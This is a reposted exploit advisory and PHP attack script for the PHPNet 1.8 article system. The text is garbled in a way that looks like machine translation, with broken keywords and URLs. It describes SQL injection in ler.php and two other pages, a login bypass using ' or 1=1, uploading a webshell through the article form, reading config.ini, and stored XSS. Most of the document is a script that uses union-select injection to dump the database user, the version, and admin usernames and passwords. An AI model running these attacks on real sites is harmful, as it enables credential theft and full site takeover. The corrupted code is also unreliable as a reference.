PHPNet & lt; = 1.8 (ler. php) SQL injection and repair

<? Php
Title: PHPNet <= 1.8 (ler. php) SQL Injection
 
Author: WhiteCollarGroup
Developer: http://www.phpnet.com.br/
: Http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos
Affected Versions: 1.8
Test Platform: Debian GNU/Linux, Windows 7 Ultimate
 

 
/*
We found multiple SQL injections in this system.

~> SQL Injection
 
This exploit is for a vulnerability in ler. php, but are the same vulnerability on imprimir. php and imagem. php.
 
Ler. php? Id = [SQLi]
 
Imprimir. php? Id = [SQLi]
 
Imagem. php? Id = [SQLi]
 

 
Example
Php file. php http://www.2cto.com/path/
 

 
~> Login bypass
 
In login page, you can bypass the login using "SQLi strings ".
 
Go to http: // www.2cto.com/path/admin/login. php
 

 
Login: 'or 1 = 1 -- wc
 
Pass: wcgroup
 

 
~> Arbitrary File Upload
After open administration panel, try to add a new article.
 
Use the upload form to upload your webshell.
 
After posting, access:
 
Http: // server/path/tmp/your_shell_filename.php
 

 
~> Information Leakage
Access:
 
Http: // server/path/conf/config. ini
 

 
~> XSS Stored (persistent)
 
When posting a new article, you can post (D) HTML/Javascript codes on the page.
 

 
*/
 

 
Function _ printf ($ str ){
 
Echo $ str. "\ n ";
 
}
 

 
Function hex ($ string ){
 
$ Hex = ''; // PHP 'dim' =]
 
For ($ I = 0; $ I <strlen ($ string); $ I ++ ){
 
$ Hex. = dechex (ord ($ string [$ I]);
 
}
 
Return '0x '. $ hex;
 
}
 

 
Set_time_limit (0 );
 
Error_reporting (E_ERROR & E_USER_WARNING );
 
@ Ini_set ('default _ socket_timeout ', 30 );
 
Echo "\ n ";
 

 
Echo "PHPNet <= 1.8 SQLi Exploit \ n ";
 
Echo "Discovered by WhiteCollarGroup \ n ";
 
Echo "www.wcgroup.host56.com-whitecollar_group@hotmail.com ";
 
If ($ argc! = 2 ){
 
_ Printf ("Usage :");
 
_ Printf ("php $ argv [0] <target> ");
 
_ Printf ("Example :");
 
_ Printf ("php $ argv [0] http: // www.2cto.com/path /");
 
Exit;
 
}
 

 
$ Target = $ argv [1];
 
If (substr ($ target, (strlen ($ target)-1 ))! = "/") {// Se o ultimo caractere nao for uma barra
 
$ Target. = "/";
 
}
 

 
$ Inject = $ target. "ler. php? Id =-0 '% 20 ";
 

 
$ Token = uniqid ();
 
$ Token_hex = hex ($ token );
 

 
// Vamos agora obter OS seguintes dados: user () version ()
 
Echo "\ n [*] Trying to get informations... \ n ";
 

 
$ Infos = file_get_contents ($ inject. urlencode ("union all select 1, 2, 3, 4, concat (". $ token_hex. ", version (),". $ token_hex. ", user (),". $ token_hex. "), 6, 7, 8 --"));
 
$ Infos_r = array ();
 
Preg_match_all ("/$ token (. *) $ token (. *) $ token/", $ infos, $ infos_r );
 
$ User = $ infos_r [1] [0];
 
$ Version = $ infos_r [2] [0];
 
If ($ user) AND ($ version ))
 
{
 
Echo "[!] MySQL user: $ user \ n ";
 
Echo "[!] MySQL version: $ version \ n ";
 
}
 
Else
 
{
 
Echo "[-] Error while getting informations... \ n ";
 
}
 

 
$ I = 0;
 
While (1 = 1 ){
 
$ Dados_r = array ();
 
$ Dados = file_get_contents ($ inject. urlencode ("union all select 1, 2, 3, 4, concat (". $ token_hex. ", admin_user ,". $ token_hex. ", admin_pass ,". $ token_hex. "), 6, 7, 8 from pna_admin limit $ I, 1 --"));
 
Preg_match_all ("/$ token (. *) $ token (. *) $ token/", $ dados, $ dados_r );
 
$ Login = $ dados_r [1] [0];
 
$ Senha = $ dados_r [2] [0];
 
If ($ login) AND ($ senha )){
 
Echo "-+-\ n ";
 
Echo "[!] User: $ login \ n ";
 
Echo "[!] Pass: $ senha \ n ";
 
$ I ++;
 
} Else {
 
Break; // exitloop
 
}
 

 
If ($ I = 0 ){
 
Echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry .";
 
} Else {
 
Echo "-+-\ n [!] : D ";
 
}
 
Echo "\ n ";
 
}
 

 
?>